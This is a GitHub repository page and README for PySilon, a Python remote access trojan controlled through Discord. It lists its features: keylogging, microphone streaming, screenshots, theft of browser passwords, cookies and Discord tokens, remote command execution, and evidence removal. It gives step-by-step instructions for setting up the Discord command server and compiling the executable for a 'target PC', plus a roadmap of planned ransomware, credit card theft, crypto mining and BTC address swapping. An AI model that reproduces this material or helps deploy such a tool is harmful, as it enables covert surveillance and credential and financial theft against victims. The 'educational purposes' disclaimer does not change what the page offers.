Skip to content
/ PySilon-malware Public

Advanced RAT written in Python language, fully controllable through Discord with dedicated GUI builder to make preparation easier.

pysilon.net

License

MIT license
975 stars 162 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

mategol/PySilon-malware

3 Branches31 Tags

Repository files navigation

PySilon

Advanced RAT malware written in Python, fully controllable through Discord.

Table of contents

Disclaimer

Information and code provided on this repository are for educational purposes only. The creator is no way responsible for any direct or indirect damage caused due to the misusage of the information. Everything you do, you are doing at your own risk and responsibility.

Features

PySilon malware can do plenty of things, like:

  • log every key pressed on keyboard
  • take screenshots anytime you want
  • record microphone input (24/7) and save it in .wav files
  • stream live microphone input on voice channel
  • browse files on target PC
  • upload and download files from target PC
  • grab history, cookies and passwords saved in web browsers
  • grab discord tokens and system information (ToDo)
  • browse and kill running processes
  • execute files
  • run CMD commands
  • update itself (ToDo)

Preparation

This malware is designed for Windows and because of some pip packages are available only on Windows (maight be changed in future for Linux support), I'm afraid that you can't compile it on Linux (at least with compiler.py):
git clone https://github.com/mategol/pysilon-malware
pip install -r requirements.txt
Follow the Setup instructions

Available commands

.ss - take screenshot at any time
.join - join voice-channel and stream live microphone input
.show <what-to-show> - get list of running processes or available commands
.kill <process-id> - kill any running process
.grab <what-to-grab> - grab for example saved passwords in web browsers
* .clear - clear messages from file-related channel
* .pwd - show working directory
* .tree - show tree of working directory
* .ls - list content of working directory
* .cd <dir> - change working directory
* .download <file-or-dir> - download any file or zipped directory (also greater than 8MB ones) from target PC
* .upload <type> [name] - upload any file or zipped directory (also greater than 8MB ones) onto target PC
* .execute <file> - run any file on target PC
* .remove <file-or-dir> - remove file or directory on target PC
.update - update PySilon remotely
.implode - remove PySilon from target PC and clean the "evidence"


* command available on file-related channel only

Setup

This process consists of 2 stages:

1. Prepare Discord server and Discord BOT
2. Compile malware to Windows executable

Prepare Discord server and Discord BOT

First of all, you need Discord server as environment for remote controlling PySilon. In order to do that, create new one:

Then, create 4 text-channels and 1 voice-channel for different use:
• main -> for main KeyLogger output and general commands
• spam-gaming -> for filtered KeyLogger output while target is (for example) playing game
• recordings -> for storing microphone recordings
• file-related -> for everything that is related to files
• Live microphone -> for streaming live microphone input

Then, go to Discord Developer Portal and create new application:

Then, go to the BOT section and add a BOT:

Then, check all "intents" and save changes:

Then, reset BOT-Token and copy it for later use:

Then, go to "OAuth2" section and "URL Generator" tab:

THen, check "bot" scope and "Administrator" permissions:

Then, copy and open generated URL. New window will appear. Select "PySilon controller" server and BOT will join:

As you can see, BOT is now in the server:


Get channel IDs for proper messaging

You need to enable "Developer mode" in Discord settings:


To copy channel ID, just right-click on channel and click "Copy ID".


Run compiler.py and enter all needed values to successfully build RAT Windows executable.

if you encounter any errors, please raise an Issue and I will be happy to help.

Now, everything is ready for a showtime


Commands manual


.ss

This command takes a screenshot of target PC at any time:


.join

This command makes BOT join voice-channel and stream live microphone input:


.show <what-to-show>

<what-to-show> - as typed, specifies the information that you want to obtain. These can be "processes" or "commands" at the moment (without quotes).
"processes" gives you a list of currently running processes on target PC.
"commands" gives you a list of all available commands along with short brief about them.
This command shows you specific types of information:


.kill <process-id>

<process-id> - index of process attached after .show processes command
This command kills running process:


.grab <what-to-grab>

<what-to-grab> - as typed, specifies the things you want to grab. These can be "passwords" or "discord" at the moment (without quotes).
"passwords" grabs all passwords saved in web browsers.
"discord" grabs Discord authentication Tokens.
"history" grabs web browsers history.
"cookies" grabs cookies.
This command grabs sensitive data (for example saved credentials):


.clear

This command clears messages from file-related channel:


.pwd

This command shows you working directory path:


.tree

This command shows you file-and-directory structure of working directory:


.ls

This command shows you content of working directory:


.cd <directory>

This command changes working directory:


.download <file-or-directory>

This command allows you to download a file or zipped directory from target PC:


.upload <type> [filename]

<type> - "single" or "multiple" (without quotes)
"single" means that you want to upload one file (with size smaller than 8MB)
"multiple" means that you want to upload multiple files (prepared by tools/splitter.py with total size greater than 8MB)
[filename] - name of uploaded file (this option is required only wtih type of multiple)
This command allows you to upload a file or zipped directory onto target PC:


.execute <file>

This command starts any file on target PC:


.remove <file-or-dir>

This command removes any file or directory on target PC:


.update

This command updates already working malware remotely (with executable prepared by you and splitted by splitter.py):


.implode

This command completely removes PySilon malware from target PC and cleans possible evidence. It requires a key generated with tools/compiler.py at this step:


ToDo

List of features that should appear in following releases:

  • malware remote update
  • optional ransomware
  • fork bomb (wabbit)
  • webhook connection in case of unexpected circumstances (like BOT-Token banned by Discord)
  • different acting on Virtual-Machines (like Blue Screen of Death)
  • grab saved Wi-Fi passwords
  • capture webcam images
  • overall system info grabber with cool Discord Embeds
  • traditional reverse shell creator
  • grab credit cards information
  • optional crypto mining (for example, when victim is idle)
  • grab sessions from popular applications (Steam/Minecraft/Metamask/Exodus/Roblox)
  • replace BTC copied address by your one

About

Advanced RAT written in Python language, fully controllable through Discord with dedicated GUI builder to make preparation easier.

pysilon.net

Topics

python screenshot discord grabber malware gui-application rat startup keylogger discord-py remote-access-trojan stealer python-malware discord-keylogger discord-malware grabber-password discord-rat python-rat grabber-token grabber-tool

Resources

Readme

License

MIT license

Code of conduct

Code of conduct
Activity

Stars

975 stars

Watchers

26 watching

Forks

162 forks
Report repository

Releases 31

PySilon v3.7.5 Latest
Jun 28, 2024
+ 30 releases

Packages

No packages published

Contributors 10

Languages